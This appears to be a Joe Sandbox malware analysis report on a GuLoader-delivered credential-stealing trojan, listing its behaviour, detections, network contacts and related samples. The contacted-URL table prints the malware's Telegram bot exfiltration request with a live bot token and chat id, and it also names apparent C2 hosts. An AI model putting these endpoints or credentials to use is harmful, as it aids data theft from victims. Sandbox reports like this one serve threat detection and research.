Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management
Collection: 1 Archive Collected Data | 1 Data from Local System | 1 Email Collection | 1 Clipboard Data | Keylogging | GUI Input Capture | Web Portal Capture
Command and Control: 1 Web Service | 3 Ingress Tool Transfer | 11 Encrypted Channel | 4 Non-Application Layer Protocol | 15 Application Layer Protocol | Multiband Communication | Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel
Impact: 1 System Shutdown/Reboot | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery
Behavior Graph (ID 1620273, sample rAntephialtic.exe, start date 20/02/2025, architecture WINDOWS, score 100). Information recoverable from the graph:

• Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for dropped file; 6 other signatures. Network nodes: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 4 other IPs or domains.
• rAntephialtic.exe started; dropped C:\Users\user\AppData\Local\...\nsExec.dll (PE32); started powershell.exe.
• powershell.exe dropped C:\Users\user\AppData\...\rAntephialtic.exe (PE32) and C:\...\rAntephialtic.exe:Zone.Identifier (ASCII); signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; 3 other signatures. Started msiexec.exe and conhost.exe.
• msiexec.exe contacted checkip.dyndns.com (132.226.247.73, ports 49977, 49980, 49982; UTMEMUS, United States), api.telegram.org (149.154.167.220, ports 443, 49994, 49995; TELEGRAMRU, United Kingdom) and 3 other IPs or domains; signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc).

Antivirus detection of the submitted sample
Source | Detection | Scanner | Label
rAntephialtic.exe | 21% | ReversingLabs | Win32.Trojan.Garf
rAntephialtic.exe | 26% | Virustotal |

Antivirus detection of dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsd4D6C.tmp\nsExec.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Illustrable\Adlende\rAntephialtic.exe | 21% | ReversingLabs | Win32.Trojan.Garf

No Antivirus matches
No Antivirus matches

Antivirus detection of URLs
Source | Detection | Scanner | Label
https://go.micr | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.250.184.238 | true | false | | high
drive.usercontent.google.com | 172.217.16.129 | true | false | | high
reallyfreegeoip.org | 104.21.32.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 132.226.247.73 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
https://api.telegram.org/bot7905739203:AAHVrbaqwZh7jsUdl3dYwh5_SurA4XOPFCU/sendDocument?chat_id=8187594209&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:320946%0D%0ADate%20and%20Time:%2021/02/2025%20/%2004:32:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20320946%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
http://checkip.dyndns.org/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.office.com/ | msiexec.exe, 00000006.00000002.2558138839.0000000025846000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.1817583118.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.1814890454.0000000004B26000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/j | msiexec.exe, 00000006.00000003.1968586148.00000000099C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2545108464.00000000099AB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.1814890454.0000000004B26000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.1814890454.0000000004B26000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoft | powershell.exe, 00000003.00000002.1828142930.0000000008382000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.1814890454.0000000004B26000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000003.00000002.1817583118.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000003.00000002.1817583118.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/ | msiexec.exe, 00000006.00000003.1968586148.00000000099C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2545108464.00000000099AB000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org | msiexec.exe, 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=en4 | msiexec.exe, 00000006.00000002.2558138839.0000000025815000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | rAntephialtic.exe, 00000001.00000000.1292918394.000000000040A000.00000008.00000001.01000000.00000003.sdmp, rAntephialtic.exe, 00000001.00000002.1362477384.000000000040A000.00000004.00000001.01000000.00000003.sdmp | false | | high
https://chrome.google.com/webstore?hl=en | msiexec.exe, 00000006.00000002.2558138839.0000000025815000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2558138839.0000000025846000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.google.com/G | msiexec.exe, 00000006.00000002.2545108464.000000000994A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://varders.kozow.com:8081 | msiexec.exe, 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.1814890454.0000000004B26000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://aborters.duckdns.org:8081 | msiexec.exe, 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.office.com/4 | msiexec.exe, 00000006.00000002.2558138839.0000000025846000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6lB | powershell.exe, 00000003.00000002.1814890454.00000000049D1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.google.com/ | msiexec.exe, 00000006.00000002.2545108464.000000000994A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://anotherarmy.dns.army:8081 | msiexec.exe, 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micr | powershell.exe, 00000003.00000002.1814545646.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000003.00000002.1814890454.0000000004B26000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000003.00000002.1817583118.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.1817583118.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=enlB | msiexec.exe, 00000006.00000002.2558138839.0000000025810000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189$ | msiexec.exe, 00000006.00000002.2558138839.00000000256F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2558138839.000000002573E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org | msiexec.exe, 00000006.00000002.2558138839.000000002573E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.1814890454.00000000049D1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.21.32.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
172.217.16.129 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
142.250.184.238 | drive.google.com | United States | 15169 | GOOGLEUS | false
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1620273
Start date and time: 2025-02-20 20:00:18 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: rAntephialtic.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/30@5/5
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 133
• Number of non-executed functions: 28
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target msiexec.exe, PID 8180 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7700 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
14:01:25 | API Interceptor | 38x Sleep call for process: powershell.exe modified
15:57:30 | API Interceptor | 2261x Sleep call for process: msiexec.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | rfacturapendiente.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | invoice for payment request.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | remitance copy.exe | malicious | AgentTesla |
149.154.167.220 | New PO 127429.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | BugSplat64.dll.dll | malicious | MSIL Logger, MassLogger RAT |
149.154.167.220 | Your Social Security Benefit letter-A0049264-EXDL-492642349264QXD.JS.js | malicious | AsyncRAT |
149.154.167.220 | COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer |
149.154.167.220 | RFQ-INQUIRY#46883-A24.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | 7721128075242.CI.DeclarationChargeDetails.DNP FedEx.vbs | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | Quotation.scr.exe | malicious | Snake Keylogger, VIP Keylogger |
104.21.32.1 | SFT20020117.exe | malicious | FormBook | www.fz977.xyz/7p42/
104.21.32.1 | PO from tpc Type 34.1 34,2 35 Spec.js | malicious | FormBook | www.tumbetgirislinki.fit/k566/
104.21.32.1 | REQUEST FOR QUOTATION.exe | malicious | FormBook | www.clouser.store/3r9x/
104.21.32.1 | PO 87877889X,pdf.Vbs.vbs | malicious | FormBook | www.tumbetgirislinki.fit/k566/
104.21.32.1 | http://projectlombok.org | malicious | Unknown | projectlombok.org/
104.21.32.1 | (BBVA) SWIFT_consulta_de_operaciones 10-02-2025-PDF.exe | malicious | FormBook | www.kdrqcyusevx.info/k7wl/
104.21.32.1 | SOA - Final Payment.exe | malicious | FormBook | www.arryongro-nambe.live/ljgq/
104.21.32.1 | SOA-CAVER.exe | malicious | FormBook | www.arryongro-nambe.live/ljgq/
104.21.32.1 | PO 564787YTSH.exe | malicious | FormBook | www.fz977.xyz/406r/?AvfPLv6=wl5Nj3SJXS6GKn33CDD6HhAqZgINmZqHvejr4cyaljig9n9IuVxSUHCyJDl4Cu/tzA+kDqqkCxMkWFu0wkrrG4aGxN75si4Ma+LLK0X8cPPOW9ttkQ==&uF=ithpsd
104.21.32.1 | Proposed Residential Building at City Walk Phase 5.vbs | malicious | FormBook | www.lucynoel6465.shop/jgkl/
132.226.247.73 | Ziraat Bankasi Swift Mesaji.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | invoice for payment request.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.247.73 | Bank Slip pdf (2).exe | malicious | MSIL Logger, MassLogger RAT | checkip.dyndns.org/
132.226.247.73 | Quotation.scr.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.247.73 | Request For Quote.exe | malicious | MSIL Logger, MassLogger RAT | checkip.dyndns.org/
132.226.247.73 | RECEIPT ATTACHMENT.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | Bibliofils.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | Researches.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | rSlutelementer.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | REQ. NO.237.exe | malicious | Snake Keylogger | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | Ziraat Bankasi Swift Mesaji.exe | malicious | Snake Keylogger | 104.21.16.1
reallyfreegeoip.org | rfacturapendiente.exe | malicious | GuLoader, Snake Keylogger | 104.21.32.1
reallyfreegeoip.org | invoice for payment request.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.32.1
reallyfreegeoip.org | New PO 127429.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.48.1
reallyfreegeoip.org | BugSplat64.dll.dll | malicious | MSIL Logger, MassLogger RAT | 104.21.80.1
reallyfreegeoip.org | 60069-PO-13228.pdf.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.16.1
reallyfreegeoip.org | RFQ-INQUIRY#46883-A24.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.16.1
reallyfreegeoip.org | proforma fatura No. 90273641836.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.48.1
reallyfreegeoip.org | rlgh5walrVUMJyT7.exe | malicious | Snake Keylogger | 104.21.96.1
reallyfreegeoip.org | purchase_order_u83784899.cmd | malicious | DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer | 104.21.64.1
checkip.dyndns.com | Ziraat Bankasi Swift Mesaji.exe | malicious | Snake Keylogger | 132.226.247.73
checkip.dyndns.com | rfacturapendiente.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
checkip.dyndns.com | invoice for payment request.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
checkip.dyndns.com | New PO 127429.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | BugSplat64.dll.dll | malicious | MSIL Logger, MassLogger RAT | 193.122.6.168
checkip.dyndns.com | 60069-PO-13228.pdf.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.130.0
checkip.dyndns.com | RFQ-INQUIRY#46883-A24.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | proforma fatura No. 90273641836.exe | malicious | MSIL Logger, MassLogger RAT | 158.101.44.242
checkip.dyndns.com | rlgh5walrVUMJyT7.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | purchase_order_u83784899.cmd | malicious | DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer | 193.122.130.0
api.telegram.org | rfacturapendiente.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | invoice for payment request.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | remitance copy.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | New PO 127429.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | BugSplat64.dll.dll | malicious | MSIL Logger, MassLogger RAT | 149.154.167.220
api.telegram.org | Your Social Security Benefit letter-A0049264-EXDL-492642349264QXD.JS.js | malicious | AsyncRAT | 149.154.167.220
api.telegram.org | COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
api.telegram.org | RFQ-INQUIRY#46883-A24.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | 7721128075242.CI.DeclarationChargeDetails.DNP FedEx.vbs | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | Quotation.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | rfacturapendiente.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | Setup.exe | malicious | Vidar | 149.154.167.99
TELEGRAMRU | invoice for payment request.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | remitance copy.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | New PO 127429.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | BugSplat64.dll.dll | malicious | MSIL Logger, MassLogger RAT | 149.154.167.220
TELEGRAMRU | Your Social Security Benefit letter-A0049264-EXDL-492642349264QXD.JS.js | malicious | AsyncRAT | 149.154.167.220
TELEGRAMRU | COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
TELEGRAMRU | http://techinline.vip/first-get-min-prems | malicious | Telegram Phisher | 149.154.167.99
TELEGRAMRU | RFQ-INQUIRY#46883-A24.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
UTMEMUS | Ziraat Bankasi Swift Mesaji.exe | malicious | Snake Keylogger | 132.226.247.73
UTMEMUS | invoice for payment request.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
UTMEMUS | Bank Slip pdf (2).exe | malicious | MSIL Logger, MassLogger RAT | 132.226.247.73
UTMEMUS | Quotation.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
UTMEMUS | Request For Quote.exe | malicious | MSIL Logger, MassLogger RAT | 132.226.247.73
UTMEMUS | RECEIPT ATTACHMENT.exe | malicious | Snake Keylogger | 132.226.247.73
UTMEMUS | Finerede.exe | malicious | GuLoader, Snake Keylogger | 132.226.8.169
UTMEMUS | Bibliofils.exe | malicious | GuLoader, Snake Keylogger | 132.226.247.73
UTMEMUS | Researches.exe | malicious | GuLoader, Snake Keylogger | 132.226.247.73
UTMEMUS | MV GOLDEN SCHULTE PARTICULARS.exe | malicious | Snake Keylogger | 132.226.8.169
CLOUDFLARENETUS | https://aiuinc.us15.list-manage.com/track/click?u=fb8654b8cb0515d99bfc2b379&id=988bbe41bd&e=60384fd84b | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | https://ferreiros.pe.leg.br/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%201/ | malicious | HTMLPhisher | 104.21.27.125
CLOUDFLARENETUS | Ziraat Bankasi Swift Mesaji.exe | malicious | Snake Keylogger | 104.21.16.1
CLOUDFLARENETUS | https://drive.google.com/file/d/12Uk0AXrn-yrwAbnUpfSwOLhITru9RqyT/view?usp=sharing | malicious | HTMLPhisher | 104.18.40.68
CLOUDFLARENETUS | SecuriteInfo.com.Win64.Evo-gen.21573.534.exe | malicious | Unknown | 104.21.29.31
CLOUDFLARENETUS | SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe | malicious | Unknown | 162.159.128.233
CLOUDFLARENETUS | SecuriteInfo.com.Win64.Evo-gen.22439.26634.exe | malicious | Unknown | 172.67.171.71
CLOUDFLARENETUS | SecuriteInfo.com.Win64.Evo-gen.21573.534.exe | malicious | Unknown | 172.67.171.71
CLOUDFLARENETUS | SecuriteInfo.com.Win64.Evo-gen.481.22395.exe | malicious | Unknown | 172.67.171.71
CLOUDFLARENETUS | SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe | malicious | Unknown | 162.159.135.232
JA3 fingerprint associations
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: 54328bd36c14bd82ddaa0c04b25ed9ad
Ziraat Bankasi Swift Mesaji.exe | malicious | Snake Keylogger | 104.21.32.1
rfacturapendiente.exe | malicious | GuLoader, Snake Keylogger | 104.21.32.1
invoice for payment request.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.32.1
New PO 127429.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.32.1
BugSplat64.dll.dll | malicious | MSIL Logger, MassLogger RAT | 104.21.32.1
60069-PO-13228.pdf.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.32.1
proforma fatura No. 90273641836.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.32.1
rlgh5walrVUMJyT7.exe | malicious | Snake Keylogger | 104.21.32.1
purchase_order_u83784899.cmd | malicious | DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer | 104.21.32.1
7721128075242.CI.DeclarationChargeDetails.DNP FedEx.vbs | malicious | GuLoader, Snake Keylogger | 104.21.32.1

Match: 3b5074b1b5d032e5620f69f9f700ff0e
SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe | malicious | Unknown | 149.154.167.220
SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe | malicious | Unknown | 149.154.167.220
https://1drv.ms/w/c/ce0aa4089a0cf823/IQQ-p_-u_0bbTp7ALMPgaKOzAZ_aMu35BXGkFN3emxCDEwQ | malicious | HTMLPhisher | 149.154.167.220
rfq_purchase_specification_order_18_02_2025_00000000000000000000.vbs | malicious | Unknown | 149.154.167.220
rTransferencia4317374565644017852.exe | malicious | DarkCloud | 149.154.167.220
rfacturapendiente.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
250205113R56. (#U007e30 KB).pdf.exe | malicious | DarkCloud | 149.154.167.220
rPedido371638062068484.exe | malicious | DarkCloud | 149.154.167.220
110210001.vbs | malicious | Unknown | 149.154.167.220
new.bat | malicious | Unknown | 149.154.167.220

Match: 37f463bf4616ecd445d4a1937da06e19
SecuriteInfo.com.Win64.Evo-gen.21573.534.exe | malicious | Unknown | 172.217.16.129, 142.250.184.238
SecuriteInfo.com.Win64.Evo-gen.22439.26634.exe | malicious | Unknown | 172.217.16.129, 142.250.184.238
SecuriteInfo.com.Win64.Evo-gen.21573.534.exe | malicious | Unknown | 172.217.16.129, 142.250.184.238
SecuriteInfo.com.Win64.Evo-gen.481.22395.exe | malicious | Unknown | 172.217.16.129, 142.250.184.238
calma.msi | malicious | BruteRatel, Latrodectus | 172.217.16.129, 142.250.184.238
rfacturapendiente.exe | malicious | GuLoader, Snake Keylogger | 172.217.16.129, 142.250.184.238
rFactura1-000122.exe | malicious | GuLoader | 172.217.16.129, 142.250.184.238
Setup.exe | malicious | Vidar | 172.217.16.129, 142.250.184.238
Source3.bin.exe | malicious | Unknown | 172.217.16.129, 142.250.184.238
XyfcQZsZs4.msi | malicious | Unknown | 172.217.16.129, 142.250.184.238

A JA3 value identifies the TLS client stack that built the ClientHello, not a malware family: the same fingerprint is produced by every program that uses that stack, which is why the rows above mix GuLoader, Snake Keylogger, MassLogger, DarkCloud, Vidar and Latrodectus samples. The context addresses are Cloudflare edges (104.21.32.1), the Telegram API front end (149.154.167.220) and Google (172.217.16.129, 142.250.184.238), so a JA3 or destination match on its own is a pivot for hunting, not a verdict.
Dropped file associations
Match | Associated Sample Name / URL | Detection | Threat Name

Match: C:\Users\user\AppData\Local\Temp\nsd4D6C.tmp\nsExec.dll
rfacturapendiente.exe | malicious | GuLoader, Snake Keylogger
046s01900330081250b4057885818022025.exe | malicious | GuLoader, Snake Keylogger
comprobante de pago56789076pdf.exe | malicious | FormBook, GuLoader
comprobante de pago56789076pdf.exe | malicious | GuLoader
kdrajK1oD8.exe | malicious | AgentTesla, GuLoader
NBKi8t8shT.exe | malicious | AgentTesla, GuLoader
CtB0cM3RQI.exe | malicious | AgentTesla, GuLoader
Dialyseapparatet.exe | malicious | FormBook, GuLoader
Dialyseapparatet.exe | malicious | GuLoader
PO8732401895.exe | malicious | Remcos, GuLoader

nsExec.dll is the stock NSIS installer plug-in for running commands, and an nsXXXX.tmp directory under %TEMP% is where an NSIS installer unpacks its plug-ins at run time. Its presence therefore marks the sample as an NSIS-packaged installer, the wrapper GuLoader is routinely delivered in, which is why every associated sample above carries a GuLoader verdict; the DLL itself is not the payload.
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 53158
Entropy (8bit): 5.062687652912555
Encrypted: false
SSDEEP: 1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5: 5D430F1344CE89737902AEC47C61C930
SHA1: 0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256: 395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512: DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious: false
Reputation: moderate, very likely benign file
